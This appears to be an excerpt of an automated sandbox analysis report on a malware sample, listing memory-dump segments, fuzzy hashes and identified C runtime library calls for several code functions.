                                                • Instruction Fuzzy Hash: 202261B3F515144BDB4CCB5DDCA27ECB2E3AFD8214B1E803DA40AE3345EA79D9158648
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72713ed31ada52e9280b813aec22c58bdf47c64e0ac3f0f1a643fd41b35737b0
                                                • Instruction ID: a23792a34412cca0ac4873c11894b58e9ef6c4efb3d88462007480263f5dd011
                                                • Opcode Fuzzy Hash: 72713ed31ada52e9280b813aec22c58bdf47c64e0ac3f0f1a643fd41b35737b0
                                                • Instruction Fuzzy Hash: DAB13D31614608DFD719CF28C496B657BB1FF453A8F258659EC9ACF2A1C339E982CB40
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f90ce5ba76c86ab5fc473c8a10efec46de8ab721c3c0af5cd3f217c59a226644
                                                • Instruction ID: 7fe848153a394d666b5ba21de5948b321b5c780c98f05efe261acd5fd4e4dff2
                                                • Opcode Fuzzy Hash: f90ce5ba76c86ab5fc473c8a10efec46de8ab721c3c0af5cd3f217c59a226644
                                                • Instruction Fuzzy Hash: C881FE71E002658FEB15CF68E8907EEBBF1BB19300F1442A9D950A7353D7399986CBA0
                                                APIs
                                                • ___std_exception_copy.LIBVCRUNTIME ref: 007224BE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ___std_exception_copy
                                                • String ID:
                                                • API String ID: 2659868963-0
                                                • Opcode ID: 5f040e6dc8d7c1eb15493ce9f0f97b2302e7d6a7102b0840eb2d34cf82c62deb
                                                • Instruction ID: 3cc34ddab1bc53e639523bf80937450f9326dda755b1775ce3c7975e8a9561f7
                                                • Opcode Fuzzy Hash: 5f040e6dc8d7c1eb15493ce9f0f97b2302e7d6a7102b0840eb2d34cf82c62deb
                                                • Instruction Fuzzy Hash: 0251C1B2940606CBEB29CF68E8C57ADBBF1FB48314F24C56AD415EB252D378AD40CB51
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                 • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmp
                                                 • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 069e10cf944485b640b4e41b4f3d955388efbe8c6e27f0a4624982769a547960
                                                • Instruction ID: cb64b108052610d80d92800ec0c69ceddce248595dc2b302dda16cdbbb5bad6d
                                                • Opcode Fuzzy Hash: 069e10cf944485b640b4e41b4f3d955388efbe8c6e27f0a4624982769a547960
                                                • Instruction Fuzzy Hash: CB21B673F2053947770CC47E8C5627DB6E1C78C641745823AE8A6EA2C1D96CD917E2E4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f928d66d0003bebd3e535b921bcb3d068aeaed20a25cd8539324260dfaf2b38
                                                • Instruction ID: fc5d75b2a67526bcf9fe53f1e4e9941944582ae9210e25bb73a049c37b320f24
                                                • Opcode Fuzzy Hash: 0f928d66d0003bebd3e535b921bcb3d068aeaed20a25cd8539324260dfaf2b38
                                                • Instruction Fuzzy Hash: B9118A33F30C255B675C816D8C1727A95D2DBD825471F533AD827E7284E994DE13D390
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: f1023ca903ef4cdf1cc9fb7ec02adf56c4020ab2dfa84cc3ca23a04479c854e2
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: 54117D7721018343E6C4863DC8F45B7E395EBD53217AC437AC8434FB48DE2AE8419602
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0aa803445f6b25a907ba85f5ea5acb467744fa1b8fb95d2e4083ef5758fa3975
                                                • Instruction ID: 36c5c24f810ac539f66f71162b43986e3e5e971284aa33af048321373a575f6e
                                                • Opcode Fuzzy Hash: 0aa803445f6b25a907ba85f5ea5acb467744fa1b8fb95d2e4083ef5758fa3975
                                                • Instruction Fuzzy Hash: 2BE0EC30081148EACE257F58D809A983BA9FF51757F804826FD045B625DFA9EEA6C680
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                • Instruction ID: 328582aa43f5e3a8a2ed21b16d25cdbfb705c06e7c15803f64cf7b6a10fc632f
                                                • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                • Instruction Fuzzy Hash: D5E08C32921228FBCB14DB98C9089DAF3ECEB49B05B6501A6F901D3150C2B4DE08C7D0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Mtx_unlock$Cnd_broadcast
                                                • String ID:
                                                • API String ID: 32384418-0
                                                • Opcode ID: 9c1011f1bb1644d9dc167d09ebfa13f03657ffc75abd429ba218a182afc59598
                                                • Instruction ID: 30b93360a26c443d9c6663f8c9e4404ce3edc1bb10969215cbc8ce234a34e3e7
                                                • Opcode Fuzzy Hash: 9c1011f1bb1644d9dc167d09ebfa13f03657ffc75abd429ba218a182afc59598
                                                • Instruction Fuzzy Hash: 3EA115B0A00625EFEB21DF64D949B5AB7B8FF14310F048129E815D7242EB3DEA14CBE1
                                                APIs
                                                • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00737AEC
                                                • __Cnd_destroy_in_situ.LIBCPMT ref: 00737AF8
                                                • __Mtx_destroy_in_situ.LIBCPMT ref: 00737B01
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                • String ID: d+x
                                                • API String ID: 4078500453-2553396873
                                                • Opcode ID: 7179e8816ead14b971c03e2963e1ca01833fc55ffd0589cfcc8ce1477356b388
                                                • Instruction ID: 24693ef0e4c2a68abe71687bc54fb6babf74dc0db01f27536d5ccb82557d9037
                                                • Opcode Fuzzy Hash: 7179e8816ead14b971c03e2963e1ca01833fc55ffd0589cfcc8ce1477356b388
                                                • Instruction Fuzzy Hash: A231E3F2A08304DBE734DF68D845A5AB7E8EF14310F104A2EE945C3243E7B9EA54C3A1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                                • Instruction ID: 3159f36b568f1157c5413c4f9a7d8adc5a6646116aa2b1e764666543e50fb294
                                                • Opcode Fuzzy Hash: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                                • Instruction Fuzzy Hash: 85B10432A043859FDB168F28C8817EEBBF5EF45351F14416ADC45EB242D6B89D4ACB60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                • String ID:
                                                • API String ID: 531285432-0
                                                • Opcode ID: 7ce3507d89e97e4db6fdcd93fafd27f21f3726cbd22f6f86481fba2bc0cda943
                                                • Instruction ID: 33b060911acd758cede14b63a96e2638c0a7c13327e94fdb84109ec5f5daecfc
                                                • Opcode Fuzzy Hash: 7ce3507d89e97e4db6fdcd93fafd27f21f3726cbd22f6f86481fba2bc0cda943
                                                • Instruction Fuzzy Hash: 3A211072A00219DFEF01EBA4D8869BEB779EF48710F104015F605B7252DB389D419BA1
                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 0072E4F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Xinvalid_argumentstd::_
                                                • String ID: L1x$invalid stoi argument
                                                • API String ID: 909987262-1995411823
                                                • Opcode ID: 14d033741e7e7b4959cf2395a01f5d59c56a4cb712008076c000d9baf3d656bc
                                                • Instruction ID: abac6b8f0658a11c27ac0d8f032f1d1b27d61db5fda05f21a4b41af5370b1edb
                                                • Opcode Fuzzy Hash: 14d033741e7e7b4959cf2395a01f5d59c56a4cb712008076c000d9baf3d656bc
                                                • Instruction Fuzzy Hash: 73F096B1940314EBD720AB6CAC0A95733E8EB45B11F118425FD1497252FB7C6D04C7E7